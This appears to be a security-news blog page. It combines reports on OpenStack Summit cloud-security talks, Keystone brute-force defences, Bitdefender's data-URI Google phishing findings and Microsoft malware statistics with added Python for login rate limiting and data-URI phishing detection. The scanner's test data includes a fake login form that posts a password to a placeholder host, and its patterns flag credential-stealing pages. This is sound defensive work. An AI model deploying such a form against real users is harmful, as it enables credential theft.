Monday, November 20, 2017

Properly Securing OpenStack Cloud Core Focus at Summit

The OpenStack Summit devoted many sessions to securing the open-source cloud platform. Some experts said the cloud offers an opportunity to do good security work.

ATLANTA—At multiple sessions at the OpenStack Summit here, developers and security researchers provided insight and details on properly securing an OpenStack cloud deployment. Security is one of the most often cited barriers to cloud adoption, but experts speaking at the summit don't see it as an obstacle. Enterprises really should look at cloud security from the opposite viewpoint, said Bryan Payne, director of security research at Nebula.

"Cloud is an interesting opportunity to do really good security work," Payne said. "The cloud has orchestration tools that allow you to roll out consistent configuration and update your software consistently, as well."

In a cloud deployment, there is also known hardware and software, and by having a known base, it is easier for enterprises to take the right steps to secure the cloud infrastructure, Payne said. "When rolling out infrastructure for cloud, enterprises have control of what is in place and that's a security dream," he said.

A typical security function is to look at a system to see what is different from what is expected. As such, the more an organization knows about its systems, the more it can detect any divergence. "So if you have an orchestration system and you know what your hardware and software is, then you've got a good platform for security," Payne said.

To ensure OpenStack cloud platform security, Payne advocates making sure that there is a separation of concerns such that there is a different logical network for outside the cloud versus the internal cloud network. Payne also recommends that Transport Layer Security (TLS) be configured for all OpenStack deployments. TLS provides encryption for data in motion across a network.
In a cloud deployment, beyond just the actual infrastructure that provides compute, there are also guests that run on top of the cloud in virtual machines (VMs). One of the potential cloud security risks outlined by Payne is known as a VM breakout. "What a VM breakout means is I can run code in an instance that will exploit something in the virtualization layer that will then let me run code on the host operating system itself," Payne said.

In a VM breakout situation, an attacker could potentially get access to other VMs running in a cloud. Payne emphasized that there are steps organizations can take to limit the risk of VM breakouts. Among those steps is the proper use of SELinux, or Security Enhanced Linux, which provides mandatory access control rules for processes and applications on a system.

"Getting the cloud up and running is step one," Payne said. "Securing the cloud is step two, and it is often harder than step one."

Keystone Identity Service

One primary control point for security in an OpenStack cloud is the Keystone identity service. Organizations should take steps to secure Keystone, Keith Newstadt, cloud services architect at Symantec, explained during a session at the summit. As an identity provider, Keystone is likely to be a target for brute-force attacks, he explained, in which criminals attempt to force their way into a system by using automated username and password lists in an attempt to gain access.

One way to protect Keystone against brute-force attacks is to introduce rate-limiting for user log-ins, Newstadt said. With rate limiting, only a certain number of user log-in requests can come into the system in a given time period. Organizations also need to be able to blacklist malicious IP addresses as well as detect and block anomalous patterns and user behaviors, he said.

"Keystone is the gatekeeper for OpenStack," Newstadt said. "Credentials are the keys to the kingdom, so protect them."
Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com. Follow him on Twitter @TechJournalist.
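
The log-in rate limiting and IP blacklisting Newstadt describes can be sketched as a sliding-window limiter placed in front of an identity service. This is an added example, not code from the article or from Keystone; the class, function names, thresholds and sample traffic are all assumptions made for illustration.

```python
import time
from collections import defaultdict, deque


class LoginThrottle:
    """Sliding-window limiter for log-in attempts (hypothetical helper, not Keystone code)."""

    def __init__(self, max_attempts=5, window=60.0, rejects_to_block=3, clock=time.monotonic):
        self.max_attempts = max_attempts          # attempts allowed per key per window
        self.window = window                      # window length in seconds
        self.rejects_to_block = rejects_to_block  # rejected requests before an IP is blocked
        self.clock = clock
        self.attempts = defaultdict(deque)        # key -> timestamps of recent attempts
        self.rejects = defaultdict(int)           # ip -> requests rejected so far
        self.blocklist = set()                    # a production list should expire entries

    def _over_limit(self, key, now):
        q = self.attempts[key]
        while q and now - q[0] >= self.window:    # drop attempts older than the window
            q.popleft()
        q.append(now)
        return len(q) > self.max_attempts

    def check(self, ip, username):
        """Return 'allow', 'throttle' or 'blocked' for one log-in request."""
        if ip in self.blocklist:
            return "blocked"
        now = self.clock()
        # Per-IP counting stops one host guessing many passwords; per-username
        # counting catches guesses for one account spread over many hosts.
        ip_over = self._over_limit(("ip", ip), now)
        user_over = self._over_limit(("user", username.lower()), now)
        if ip_over:
            self.rejects[ip] += 1
            if self.rejects[ip] >= self.rejects_to_block:
                self.blocklist.add(ip)            # persistent offender goes on the blocklist
                return "blocked"
        return "throttle" if (ip_over or user_over) else "allow"


def replay(events, **settings):
    """Run constructed (time, ip, username) events through a throttle with a fake clock."""
    now = [0.0]
    throttle = LoginThrottle(clock=lambda: now[0], **settings)
    decisions = []
    for t, ip, user in events:
        now[0] = t
        decisions.append(throttle.check(ip, user))
    return decisions, throttle


# Constructed sample traffic (documentation address ranges, invented usernames).
SINGLE_HOST = [(float(t), "203.0.113.9", "admin") for t in range(8)]
SPREAD_OUT = [(10.0 + i, f"198.51.100.{i + 1}", "alice") for i in range(6)]
LATER = [(16.0, "192.0.2.50", "carol"), (17.0, "203.0.113.9", "bob"),
         (100.0, "198.51.100.1", "Alice")]

if __name__ == "__main__":
    events = SINGLE_HOST + SPREAD_OUT + LATER
    decisions, throttle = replay(events)
    for event, decision in zip(events, decisions):
        print(event, decision)
    print("blocklist:", sorted(throttle.blocklist))
```

Throttling by username lets an outsider slow down log-ins for a known account, so the per-username limit is usually set looser than the per-IP one or answered with a delay rather than a refusal.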

Snowden: How the NSA ‘interdicts’ networking equipment to implant back doors...

'Supply chain interdiction' programme implanted NSA malware on US-made networking hardware

Point-of-sale malware becoming more sophisticated – report

Point-of-sale (PoS) systems that process debit and credit cards are being increasingly targeted with a wide range of malware, much of which has become highly sophisticated. Those are the findings of research undertaken by security firm Arbor Networks,...

Microsoft “Patch Tuesday” to fix critical security flaws

Microsoft's latest "Patch Tuesday" will fix two critical security flaws - and six further bugs - in a total of five updates today. However, none of the bugs will be addressed in Windows XP, which finally went out of support at the end of April, more t...

Blue Coat is looking to partner with business, says chief security...

Information security is about what you can make possible for the business, says Hugh Thompson, chief security strategist at security firm Blue Coat. This is the guiding principle for the company’s product development and acquisition strategy, he told Computer Weekly.

“Information security professionals and suppliers increasingly have to adapt to the speed of business as quickly as they can,” said Thompson. This includes being able to deal with advanced and highly-targeted threats through technologies such as sandboxing and the ability to do forensics, set policy automatically, and share threat intelligence. “This approach means that if something happens, then we learn from it globally and we can prevent it from happening again,” said Thompson.

Another key element is creating what he calls “safety nets” that enable the business to be confident and comfortable in taking more risks by using new technologies to win in their marketplace. Companies are increasingly looking to technology for competitive differentiators in a way they have not done in the past. “We want to build technology that can be put on the network to allow you to embrace technologies such as Dropbox and Google Docs, and roll out new services in a secure way,” said Thompson.

Partner with businesses

As a supplier, Blue Coat is looking to partner with businesses rather than being the people who enable IT security officers to say ‘no’, he said. For example, Blue Coat is enabling insurance companies to accept photos from customers to initiate claims by scanning the images at the gateway to ensure no malware passes into company systems. Similarly, credit companies are able to expose their internal risk assessment apps to car dealers to win business through prompt responses because of Blue Coat’s ability to block any malicious input from reaching the app.
As part of this strategy, Blue Coat is building on its dominant market position in secure web gateway and proxy products to focus on security as a means to make other things possible. “We re-tasked the company around that mission in May 2013 and have made a few acquisitions to support it,” said Thompson. These include SSL visibility and inspection firm Netronome, security analytics and forensics firm Solera Networks and threat discovery, malware analysis and sandboxing firm Norman Shark.

These acquisitions have also helped Blue Coat support the idea that while companies should protect as well as they can, they should also have the ability for recovery when bad things happen, said Thompson. “Companies are confident to do edgier things because they know they can identify malicious activity very quickly and block it,” he said.

Demand for technology to support this approach has grown in recent months, he said, driven in part by the large number of high-profile data breaches in the news. “A year ago, many companies believed they could protect their data by locking things down, but now they are starting to realise that bad things happen even to those that take security seriously,” said Thompson. The move has been led by financial services companies that tend to be early adopters of new security strategies and technologies.

Forensic investigations

“These companies understand the need for this approach because many have had to do post-incident forensic investigations using third parties,” he said. “They have seen how unsatisfying the answers usually are and so they are now asking if they can put a technology infrastructure in place to be able to do this stuff quickly.” Financial services firms and government agencies are leading the demand for the ability to recover and provide accurate answers to the public and the board quickly, he said.
“This enables companies to say exactly how bad a breach was without having to continually revise severity assessments and take immediate steps to block an attack and recover,” said Thompson. “Outside finance and government, there is still a need to encourage organisations to treat data security in the same way as other types of safety by including ways to cope when they go wrong.” Thompson said this approach will become more important as companies increasingly need to adopt technology such as cloud computing at a faster rate just to remain competitive and support growth.

Security Think Tank: Do not trust the network to ensure secure...

Most enterprises have much to gain from supporting collaborative working. For those founded on R&D it is pretty much second nature: proprietary tools support internal capabilities, uptake of social platforms encourages user participation.  Such organisations quickly pick up, pilot and absorb – or drop - iterations as they launch, and Corporate IT Forum members regularly share results and views on effectiveness (‘Yammer’ being a case in point as I write). Commercial relationships with external organisations, too, can benefit from a collaborative approach, particularly in the drive to foster innovation. But it is this process of external collaboration that most often raises challenges in meeting security and data standards, and it is vital to appreciate that, by and large, it is not the tools used for collaboration that create risk, but rather the environment they operate in. For example, in the Cloud, or across geographies. A recent Forum workshop addressed this issue of third-party collaboration, asking questions such as how practical is working across and beyond boundaries? Does the actual reward outweigh the potential risk? How are enterprises bringing partners and suppliers inside the firewall while still keeping all parties' sensitive data protected? It concluded that for many, the de-perimeterisation of the network has already happened and the natural consequence of collaboration with partners and suppliers is that they are effectively already inside the firewall.  “It just means that you do not know where the edge of your, or their, network is.” Even greater reason to protect sensitive data, and for all parties to provide assurance that their interconnectivity is not introducing unacceptable risks, and that their partners' partners are not a risk liability. 
But Forum members are keen not to reinvent the wheel when faced with this apparent ‘new’ security risk, but to apply the recognised good practice of existing security principles:

Know the Data: manage data based upon classification. Use ‘read-only’ where appropriate and screen scraping tools
Know the Users: IDM/IAM. Modify the data view according to access location
Know the Systems: have endpoint assurance
Do not trust the Network: monitoring and management. Enforce security protocols

Apply these principles anywhere, including in the cloud, whether public or private – and do not forget to support the principles with monitored audit trails.

Ollie Ross is head of research at The Corporate IT Forum.

This was first published in May 2014

Phishing attacks target Google accounts, warns Bitdefender

Hackers are stealing Google account passwords using a new phishing attack that is hard to catch with traditional heuristic detection, warns security firm Bitdefender. The attack exploits the uniform resource identifiers (URIs) that Google Chrome uses to display data. This makes Chrome users most vulnerable, but the attack also targets Mozilla Firefox users.

“With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,” said Catalin Cosoi, chief security strategist at Bitdefender. “The scam starts with an email allegedly sent by Google, with 'Mail Notice' or 'New Lockout Notice' as the subject,” he said.

The message reads: “This is a reminder that your email account will be locked out in 24 hours, due to not being able to increase your email storage quota. Go to the INSTANT INCREASE to increase your Email storage automatically.” The link then redirects victims to a fake Google login web page that asks for their credentials.

“What is interesting about this phishing attack is that users end up having the 'data:' in their browser’s address bar, which indicates the use of a data URI scheme,” said Cosoi. The data URI scheme, he said, allows scammers to include data in-line in web pages, as if they were external resources. The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string in the data URI. As Google Chrome does not show the whole string, Cosoi said regular users may not realise they are being targeted in a phishing attack and give their data to cyber criminals.

Disguised phishing on the rise

Google, Facebook, eBay, phone services and financial institutions are among phishers’ favourite disguises to invade inboxes worldwide, he said.
Phishing attacks are likely to increase due to the use of automation and the ability to bypass host-based detection systems, according to Johannes Ullrich, dean of research for the SANS Technology Institute. However, this does not mean that businesses are powerless against such attacks. There are several ways businesses can reduce the risk of successful phishing attacks. These range from security education aimed at making users more aware of phishing techniques, to implementing effective methods and procedures such as continuous network monitoring.
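
Because the fake page travels inside the link itself, a mail or web gateway can decode `data:` URIs and inspect what they carry instead of relying on the visible address. The scanner below is an added example, not Bitdefender's detection logic; the function names, verdict labels and the embedded sample are constructed for illustration, and it handles both Base64 and percent-encoded payloads.

```python
import base64
import binascii
import re
from urllib.parse import unquote_to_bytes

# RFC 2397 form: data:[<mediatype>][;base64],<data>
DATA_URI = re.compile(r"""(?<![\w-])data:([^,"'\s<>]*),([^"'\s<>]+)""", re.I)
FORM_TAG = re.compile(rb"<form\b", re.I)
PASSWORD_FIELD = re.compile(rb"""<input[^>]+type\s*=\s*["']?password""", re.I)
FORM_ACTION = re.compile(rb"""<form[^>]+action\s*=\s*["']?(https?://[^"'\s>]+)""", re.I)


def decode_data_uri(header, data):
    """Return (media_type, payload_bytes), or None when the Base64 payload is malformed."""
    params = [p.strip().lower() for p in header.split(";")]
    media_type = params[0] or "text/plain"       # RFC 2397 default when omitted
    raw = unquote_to_bytes(data)                 # undo %XX escapes in either encoding
    if "base64" not in params[1:]:
        return media_type, raw
    try:
        return media_type, base64.b64decode(raw + b"=" * (-len(raw) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def scan_for_data_uris(text):
    """Find data: URIs in a mail body or redirect page and flag embedded log-in forms."""
    findings = []
    for match in DATA_URI.finditer(text):
        decoded = decode_data_uri(match.group(1), match.group(2))
        if decoded is None:
            findings.append({"media_type": match.group(1), "verdict": "malformed", "reasons": []})
            continue
        media_type, payload = decoded
        reasons = []
        if media_type == "text/html" or FORM_TAG.search(payload):
            if PASSWORD_FIELD.search(payload):
                reasons.append("password-field")
            action = FORM_ACTION.search(payload)
            if action:
                reasons.append("posts-to:" + action.group(1).decode("ascii", "replace"))
        verdict = "credential-form" if "password-field" in reasons else "benign"
        findings.append({"media_type": media_type, "verdict": verdict, "reasons": reasons})
    return findings


# Constructed sample: a redirect page, an inline image, a percent-encoded link
# and a link whose Base64 payload is invalid. collector.example is a placeholder.
FAKE_LOGIN = (b'<form action="https://collector.example/submit" method="post">'
              b'<input name="user"><input type="password" name="pass"></form>')
SAMPLE = (
    '<meta http-equiv="refresh" content="0;url=data:text/html;base64,'
    + base64.b64encode(FAKE_LOGIN).decode("ascii") + '">\n'
    '<img src="data:image/png;base64,iVBORw0KGgo=">\n'
    '<a href="data:text/html,%3Cform%3E%3Cinput%20type%3Dpassword%3E%3C%2Fform%3E">link</a>\n'
    '<a href="data:text/html;base64,@@@@">broken</a>\n'
)

if __name__ == "__main__":
    for finding in scan_for_data_uris(SAMPLE):
        print(finding)
```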

Windows Vista trumps XP in fourth quarter malware infections, report reveals

The last quarter of 2013 saw a dramatic rise in malware infections of computers running supported versions of Microsoft Windows, a report has revealed. The increase was mainly due to the Rotbrow family of malware made up of Trojans that install browser add-ons. These claim to protect you from other add-ons, according to the latest version of the Microsoft Security Intelligence Report (SIR). The number of infected machines is expected to return to more typical levels in 2014, the report said. Typically older versions of operating systems show a higher infection rate, but Windows Vista topped the infection charts in the last three months of 2013. Even Windows 7 recorded a higher infection rate than the 13-year-old Windows XP operating system, which was the oldest in the sample and for which Microsoft has since discontinued support. According to the SIR version 16, Windows XP SP3 computers had an infection rate of just 2.42% in the last quarter of 2013, compared with 3.24% for Windows Vista SP2 and 2.59% for Windows 7 SP1. Windows 8 had a 1.73% infection rate and Windows 8.1 just 0.08%, according to figures normalised to account for the different number of computers running each version of the operating system. However, these figures do not necessarily mean that Windows 7 is a less safe environment than Windows XP, according to independent security consultant Graham Cluley. If configured correctly, he said, Windows 7 can provide better security than Windows XP because users can take full advantage of Microsoft’s Enhanced Mitigation Experience Toolkit (EMET), a utility that can block malware successfully exploiting zero-day vulnerabilities. Although EMET can be run on Windows XP Service Pack 3, users of that platform do not have access to all of its protection features, Cluley wrote in a blog post. He also points out that the statistics in Microsoft’s report cover a period when Windows XP was still receiving security updates from Microsoft.
“Going forward we can expect XP computers to become more and more riddled with malware as security holes are left unpatched,” said Cluley. He also points out this decline will not be reflected in future Microsoft SIRs because the company collects statistics only on supported versions of Windows. According to a newly published security report by the Information Commissioner’s Office (ICO), failure to update the security of software is the most common reason companies fail to keep personal data safe. The report highlights seven other common reasons organisations have failed to keep personal data secure that have been drawn from the ICO’s investigations into data breaches. “In just the past couple of months we have already seen widespread concern over the expiry of support for Microsoft XP and the uncovering of the security flaw known as Heartbleed,” said Simon Rice, the ICO’s group manager for technology. “While these security issues may seem complex, it is important that organisations of all sizes have a basic understanding of these types of threats and know what action they need to take to make sure their computer systems are keeping customers’ information secure,” he said. Rice said ICO investigations have shown that while some organisations are taking IT security seriously, too many are failing at the basics.

Microsoft Pushes Windows 8.1 Update Deadline to June 10

Microsoft urges Windows 8.1 users to apply the update or risk missing out on future security updates. The company appears to be convincing users to make the jump. Microsoft is giving Windows 8.1 holdouts a littl...

Bitcoin miner startup slapped with involuntary bankruptcy petition

HashFast: “We are evaluating our options and preparing our response."

After 17-year march, Army still drags its boots on buying high-tech...

Volume radio purchasing starts in 2017—until then, Army may still use hand signals.

License plate reader error leads to traffic stop at gunpoint, court...

Flagged vehicle did not even match the model of what the woman was driving.